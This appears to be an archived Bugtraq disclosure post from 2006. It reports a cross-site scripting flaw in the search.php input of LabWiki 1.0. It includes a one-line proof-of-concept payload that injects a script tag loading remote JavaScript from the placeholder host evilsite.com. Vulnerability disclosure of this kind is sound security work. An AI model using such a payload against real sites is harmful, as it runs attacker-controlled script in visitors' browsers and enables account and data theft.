Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
LabWiki v1.0 Jun 05 2006 02:46AM
luny youfucktard com
LabWiki 1.0

Homepage:

http://www.bioinformatics.org/phplabware/labwiki/index.php

Effected files:

search.php

The search input box does not sanatize user input before dynamically genrating it.

XSS Proof of concept:

"><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><"
...

[ more ]  




 

Privacy Statement
Copyright 2009, SecurityFocus